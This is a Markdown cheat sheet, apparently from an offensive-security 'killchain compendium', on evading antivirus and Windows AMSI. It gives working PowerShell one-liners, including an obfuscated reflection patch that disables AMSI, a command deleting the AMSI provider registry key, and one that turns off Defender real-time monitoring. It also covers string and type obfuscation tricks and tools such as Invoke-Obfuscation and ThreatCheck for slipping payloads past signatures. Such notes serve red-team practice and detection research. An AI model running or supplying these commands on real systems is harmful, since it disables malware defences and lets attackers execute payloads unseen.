killchain-compendium/antivirus_evasion.md

100 lines
3.9 KiB
Markdown
Raw Normal View History

2021-08-23 01:13:54 +02:00
# Antivirus Evasion
* Existing types
* On-Disk evasion
* In-Memory evasion
* Detection Methods
* Static Detection -- Hash or String/Byte Matching
* Dynamic / Heuristic / Behaviourial Detection -- predefined rules, run inside a sandbox
2021-12-04 00:26:03 +01:00
## Anti Malware Secure Interface
* https://docs.microsoft.com/en-us/windows/win32/amsi/
2021-08-23 01:13:54 +02:00
2021-12-04 00:26:03 +01:00
### Return Result Codes
```
AMSI_RESULT_CLEAN = 0
AMSI_RESULT_NOT_DETECTED = 1
AMSI_RESULT_BLOCKED_BY_ADMIN_START = 16384
AMSI_RESULT_BLOCKED_BY_ADMIN_END = 20479
AMSI_RESULT_DETECTED = 32768
```
### Bypass
* Patching amsi.dll
* Amsi ScanBuffer patch
* Forcing errors
* [Matt Graeber's Reflection](https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/)
* PowerShell downgrade
* [S3cur3Th1sSh1t](https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell.git)
2021-12-13 23:48:07 +01:00
* [BC-Security's AMSI bypass](https://github.com/BC-SECURITY/Empire/blob/master/lib/common/bypasses.py)
* [RastaMouse's AMSI bypass](https://github.com/rasta-mouse/AmsiScanBufferBypass/blob/main/AmsiBypass.cs)
2021-12-04 00:26:03 +01:00
* Practical example
```sh
[Ref].Assembly.GetType('System.Management.Automation.'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBtAHMAaQBVAHQAaQBsAHMA')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),'NonPublic,Static').SetValue($null,$true)
Remove-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}" -Recurse
Set-MpPreference -DisableRealtimeMonitoring $true
```
2021-12-13 23:48:07 +01:00
* Varying string concatenation and camelCasing variations of the following string
```sh
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
```
2021-08-23 01:13:54 +02:00
2021-12-04 00:26:03 +01:00
### Validate
2021-12-13 23:48:07 +01:00
* Validate Obfuscation and check which strings trigger AMSI
2021-12-04 00:26:03 +01:00
* [AMSITrigger Repo](https://github.com/RythmStick/AMSITrigger)
2021-12-13 23:48:07 +01:00
```sh
.\\AMSITrigger.exe -u <URL> -f 1
```
or
```sh
.\\AMSITrigger.exe -i <file> -f 1
```
### Further Obfuscation
* String concatenation
```sh
$OBF = 'Ob' + 'fu' + 's' +'cation'
```
* `Concatenate - ('co'+'ffe'+'e')`
* `Reorder - ('{1}{0}'-f'ffee','co')`
* `Whitespace - ( 'co' +'fee' + 'e')`
#### Type Obfuscation
* .NET has type accelerators as aliases for types to shorten them and break the signature.
* [idera](https://community.idera.com/database-tools/powershell/powertips/b/tips/posts/adding-new-type-accelerators-in-powershell)
* [0x00-0x00](https://0x00-0x00.github.io/research/2018/10/28/How-to-bypass-AMSI-and-Execute-ANY-malicious-powershell-code.html)
* [Documentation at microsoft](https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_type_accelerators?view=powershell-7.1)
* Example
* Without
```sh
[system.runtime.interopservices.marshal]::copy($buf, 0, $BufferAddress, 6);
```
* With
```sh
[dorkstork]::copy($buf, 0, $BufferAddress, 6);
```
### Automated Obfuscation
#### Powershell
* [Invoke-Obfuscation](https://github.com/danielbohannon/Invoke-Obfuscation)
* [Daniel's guide to Invoke-Obfuscation](https://www.danielbohannon.com/blog-1/2017/12/2/the-invoke-obfuscation-usage-guide)
```sh
Invoke-Obfuscation -ScriptBlock {'Payload Here'} -Command 'Token\\String\\1,2,\\Whitespace\\1' -Quiet -NoExit
```
* [__8191 character limit__](https://docs.microsoft.com/en-us/troubleshoot/windows-client/shell-experience/command-line-string-limitation) of command prompt must not be exceeded.
#### Other Obfuscation
* Pinpoint bytes that will be flagged with [ThreadCheck](https://github.com/rasta-mouse/ThreatCheck)
* Has to be build via VS. Will output a ddll, an excutable and an XML file.
* `ThreatCheck.exe -f <file>`
* [DefenderCheck](https://github.com/matterpreter/DefenderCheck)
2021-08-23 01:13:54 +02:00
2021-12-04 00:26:03 +01:00
## Links
* [cmnatic](https://cmnatic.co.uk/)
* [cmnatic's diss](https://resources.cmnatic.co.uk/Presentations/Dissertation/)
* [s3cur3th1ssh1t](https://s3cur3th1ssh1t.github.io/Bypass_AMSI_by_manual_modification/)
* [amsi.fail](https://amsi.fail/)